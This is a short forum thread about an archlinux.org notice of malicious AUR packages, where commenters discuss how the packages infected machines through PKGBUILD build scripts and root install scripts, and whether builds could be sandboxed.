Nemeski@mander.xyz to Linux@programming.dev · 17 天前Active AUR malicious packages incidentarchlinux.orgexternal-linkmessage-square27linkfedilinkarrow-up1106arrow-down10
arrow-up1106arrow-down1external-linkActive AUR malicious packages incidentarchlinux.orgNemeski@mander.xyz to Linux@programming.dev · 17 天前message-square27linkfedilink
minus-squareDefault Username@lemmy.dbzer0.comlinkfedilinkEnglisharrow-up9·17 天前This attack was executed by a script running in the PKGBUILD itself. You didn’t have to run the application to be infected since just building it will infect your machine.
minus-square9tr6gyp3@lemmy.worldlinkfedilinkEnglisharrow-up3·17 天前Yeah, I bet the build process could also be sandboxed, but Im sure its not the default.
minus-squareDefault Username@lemmy.dbzer0.comlinkfedilinkEnglisharrow-up4·17 天前Sandboxing the build process would be a process. Nix already does it, for example. Many AUR packages don’t include a full list of dependencies.
minus-squarepatlefort@lemmy.worldlinkfedilinkarrow-up2·17 天前It also had an install script that will be run as root when the package is installed. Can’t sandbox that.
This attack was executed by a script running in the PKGBUILD itself. You didn’t have to run the application to be infected since just building it will infect your machine.
Yeah, I bet the build process could also be sandboxed, but Im sure its not the default.
Sandboxing the build process would be a process. Nix already does it, for example. Many AUR packages don’t include a full list of dependencies.
It also had an install script that will be run as root when the package is installed. Can’t sandbox that.